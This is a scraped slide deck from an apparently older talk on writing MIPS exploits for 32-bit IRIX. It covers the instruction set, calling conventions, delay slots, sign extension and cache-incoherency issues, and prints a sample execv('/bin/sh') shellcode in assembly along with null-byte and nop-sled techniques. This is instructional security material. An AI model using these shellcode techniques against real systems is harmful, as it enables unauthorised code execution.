330 likes | 655 Views
Writing MIPS exploits. By Peter Werner peterw@ifost.org.au. Overview of presentation. T ake a look at the architecture. T ake a look at the instruction set. D escribe some of the issues that arise when developing exploits. L ook at some basic shellcode.
E N D
Writing MIPS exploits By Peter Werner peterw@ifost.org.au
Overview of presentation • Take a look at the architecture • Take a look at the instruction set • Describe some of the issues that arise when • developing exploits • Look at some basic shellcode. • I will only be discussing mips processors found in • SGI machines, running 32bit IRIX. I will completely • ignore floating point numbers
Overview of Architecture • MIPS stands for 'Microcomputer without interlocked • pipeline stages'. • Mips Corp, now owned by SGI, formed in 1984. The first • CPU appeared in 1985 • It is a 64 bit RISC architecture. Many problems discussed • here are common with other 64 bit risc architectures
Pipelining • It has a five stage instruction pipeline. • This means at any given time there will be five instructions • at various stages of execution active in the cpu. • Pipelines (along with aggressive caches) are what makes • risc cpus run fast. • The five stages in mips are Instruction Fetch, Read registers, • Arithmetic/logical operation, Read/Write Data Cache and • Write Back.
Instructions and Addressing • All instructions are 32bits long. • Three operand instructions • 32 registers • Memory references are always register load/stores, no • arithmetic on memory variables. • Data is addressed by using a 16 bit offset added or • subtracted to a base register value. • The assembler synthesizes various instructions to represent • different addressing modes.
Alignment • Pretty much the same as other risc architectures • Loads and stores must be aligned • Word load/stores must be aligned on 4 byte boundaries • Halfword load/stores must be aligned on 2 byte boundaries
Stacks and Calling Conventions • No real support for a stack. You can make up your own • calling conventions. • There are no push/pop instructions, or things functionally • equivalent to sparc's save/restore instructions • There are 3 main calling conventions, the first is the old (or • traditional) standard referred to as o32. • The others are n64 and n32, which share the same rules for • parameter passing, and are used when a long and pointer • type are 64 bits or 32 bits respectively. • We will be working under n32.
Jumps and Branches • There is only one real feature here, 'link' instructions • (jump and link, branch and link). • These link instructions perform the operation (jump, branch) • and store the return address in a register. • ra (register 31) is used by default, but can be user specified. • Yes, the return address is stored in a register.
Jumps and Branches cont. • But, by convention, it is also stored on the stack on • function entry, so it can still be overwritten. • Return values are stored in v0 ($2) and v1 ($3) if need be • System calls place the arguments in the registers • a0 ... a7, and the syscall number in v0. Integer return • values will be in v0
Branch Delay Slots • Due to the pipelined architecture, the instruction after a • branch or jump instruction will be executed • This is usually hidden from assembler programmers by the • assembler, but can be disabled if need be. • When a branch is taken, the return address will be at • <branch instruction + 8>.
Branch Delay Slots cont. eg: 0x10001000: bal foo 0x10001004: move a0, t0 0x10001008: move t0, v0 • So when the branch to foo is taken, move a0, t0 will be • executed and ra ($31) will contain 0x10010008 (move t0, v0)
Integerregister usage in n32 and n64 $0 zero Always zero (ala sparc's %g0) $1 at Reserved for the assembler $2,$3 v0,v1 Return value from functions, syscall # $4-$11 a0-a7 Function arguments $12-$15 t0-t3 Temporaries $24,$25 t8,t9 Temporaries (t4-t7 exist in o32) $16-$23 s0-s7 Saved registers $26,$27 k0,k1 Reserved for interrupt/trap handler $28 gp Global Pointer $29 sp Stack pointer $30 s8/fp Extra saved variable or frame pointer $31 ra Return address
Instruction encoding • As mentioned before, each instruction is 32 bits. • Commonly, the higher order 16 bits (31-16) describe the • instruction and operands, with the lower order bits (15-0) • making up a 16 bit offset. • This means in shellcode using an instruction fitting the • description above, small constants (eg file descriptor • numbers) will result in a null byte. • This leads to constructs that can be somewhat confusing.
Instruction encoding cont. • Sometimes, the encoding of the register operands can • also lead to null bytes, but this is usually easily avoided • by using different registers. • eg: • beq zero, zero, foo -> \x10\x00\xff\xff • beq t0, t0, foo -> \x11\x8c\xff\xff
Some common instructions move r1, r2 move the value of r2 into r1 add r1, r2, c r1 = r2 + c (c a constant) subu r1, r2, c r1 = r2 - c li r, c load a sixteen bit integer c into register r la r, addr load the addr into register r lw r, addr load a word at addr into r sw r, addr store the word in r at location addr syscall cause a system call exception jr r jump to the address in register r jal label jump to label, put the return address in ra b label goto label bal label goto label and put return address in ra beq r1, r2, label if r1 == r2, goto label bltzal r1, label branch if r1 is less than zero and link
A sample assembly program .data sh: .asciiz "/bin/sh" .text LEAF(main) .set noreorder li v0, 1011 # 1011 = syscall # of execv la t0, sh # load the address of sh string sw t0, 0(sp) # argv[0] = "/bin/sh" sw zero, 4(sp) # argv[1] = NULL move a0, t0 # load address of string move a1, sp # load the address of argv syscall # execv("/bin/sh", argv) END(main)
Common Constructs in Shellcode • loading a small number into a register li t5, 1234 subu t5, (1234 - 1) • t5 now has a value of 1
Common Constructs in Shellcode cont. • Getting the current address: label: bltzal zero, label move t0, t0 move a0, a0 • At the move a0, a0 instruction, the current address is in ra • Since branch instructions are pc relative, bltzal zero, 0xffff • will result in the address of the bltzal instruction + 8 being • in ra
Common Constructs in Shellcode cont. • the nop instruction is encoded as 0x00000000, this is • obviously bad if we want null byte free shellcode. • you can use any instruction that uses only registers • and immediates, eg, something like li t7, 0x1234 • the instruction encoded as 0x20202020 is also a nop
Sign Extension • My copy of IRIX is a 32 bit operating system running on • a 64 bit architecture. • Its registers are 64 bit. This means bits 63 - 32 go unused. • How does the cpu know if a 32 bit value stored in a 64 bit • space is positive or negative? It uses sign extension. • Generally, negative numbers have their highest order bit • (31) set to 1, while positive numbers have it set to 0. • When a value is stored in 64 bit space, bit 31 is copied to • bits 32-63.
Sign Extension cont. • eg, sign extended 32 bit -2 looks like 0xfffffffffffffffe • sign extended 32 bit +2 looks like 0x0000000000000002 • Since memory addresses are always positive, this means • addresses will always have four null bytes in them. • It goes against the mips spec for any userspace address to • have its higher order bits set (eg the valid range • is 0x0000000000000000 - 0x000000007fffffff)
Sign Extension cont. • Take a typical strcpy buffer overflow. our payload would • look something like this: • <nop sled><shellcode><return address> • Since <return address> has four null bytes between it and • the shellcode, strcpy will stop before overwriting the return • address. • This only really affects str* based overflows, memcpy • overflows/format strings are usually ok.
Cache Incoherency • Cache incoherency can be tricky to get around. Mips CPU's • have two caches, one for data (the D-cache) and one for • instructions (the I-cache). These caches are completely • independent from each other • In a typical exploit, the shellcode will be read in by a • vulnerable program and stored in some data buffer • So, it will enter in via the cpu's data cache • When the cpu starts to execute the shellcode, there is no • guarantee that the data cache will have been written back • to memory (and usually it hasn't).
Cache Incoherency cont. • So when the shellcode is executed, it will look in the I-cache • for the instructions. There is no way our shellcode will be in • the I-cache. So, the I-cache will go back to main memory • and fetch some instructions. • Since out shellcode is still sitting in the D-cache, these • instructions will not be what we want, and an error will occur. • If the shellcode modifies itself, these modifications will be • written to the data cache. So its pretty important that the • shellcode gets written back to memory. • Cache incoherency usually manifests as the process • receiving SIGILL (Illegal Instruction)
Cache Incoherency cont. • There are two ways around this. • First of all, use a big nop sled. Empirically, one page • (4096 bytes) of nop's seems to work pretty well. LSD • payloads (nop sled + shellcode) usually go in 10000 byte • buffers. • This is a good technique for local exploits, just stick the • payload in your environment and return to that.
Cache Incoherency cont. • For remote exploits, where you usually don’t have enough • space for a big nop sled, make use of blocking syscalls. • For example, write the shellcode to the remote side, but • make the exploit sleep for a bit, then write the shellcode • again (or something similar). • The vulnerable service will sleep on the blocking syscall • (say read(2)) and another process will be run. Thecontext • switch will alleviate the problem. • LSD's telnetd remote used this technique. If I understand • things correctly, the nopsled and shellcode fit in a 97 byte • buffer.
Alignment • I spoke about store/load alignment a bit before. • Instructions must also be aligned on a word boundary • If not, the process will receive a SIGBUS (Bus Error) • Since all instructions are 32 bits, its usually pretty easy to • sort this out, just have a look at your shellcode in a • debugger. • Sometimes, cache incoherency can generate SIGBUS or • SIGSEGV instead of SIGILL.So make sure you’ve taken • care of that before moving on to further debugging
Some Sample Shellcode • execv("/bin/sh", argv) shellcode by the LSD group, 44 bytes. • Our /bin/sh string begins at a 36 byte offset from bltzal or • 28 bytes from the first addi
Some Sample Shellcode cont. bltzal zero,0xffff # branch back to ourselves li v0,1011 # load execv syscall # in delay slot addi ra,ra,276 # add a largish constant addi a0,ra,-248 # a0 = ra + 28 == address of sh string addi a1,ra,-240 # a1 = space after payload to build argv sw a0,-240(ra) # argv[0] = "/bin/sh" sw zero,-236(ra) # argv[1] = NULL sb zero,-241(ra) # null terminate our sh string syscall # execv("/bin/sh", argv)
Some Sample Shellcode cont. 0x10001000: bltzalzero,0xffff 0x10001004: liv0,1011 0x10001008: addira,ra,276 # ra = 1000111c 0x1000100c: addia0,ra,-248 # (28) 0x10001024 0x10001010: addia1,ra,-240 # (36) 0x1000102c 0x10001014: swa0,-240(ra) # (36) 0x1000102c 0x10001018: swzero,-236(ra)# (40) 0x10001030 0x1000101c: sbzero,-241(ra)# (35) 0x1000102b 0x10001020: syscall 0x10001024:“/bin” 0x10001028:“/sh” 0x1000102c: here we build our argv
References • LSD: http://www.lsd-pl.net • - excellent docs on writing mips exploits • - many irix exploits available • - should be your first stop • - also helped with the cache incoherency discussion • in this presentation • TESO: http://www.team-teso.net • - Has a doc by scut with more example mips shellcode
References • See Mips Run by Dominic Sweetman • -Published by Morgan Kauffman • - Great book on mips architecture • IFOST: http://www.ifost.org.au/~peterw/mipstalk/ • - Ill put a sample vulnerable program and exploit up • there • - Also put this talk as a .ppt and text file • - Feel free to email with with questions, • peterw@ifost.org.au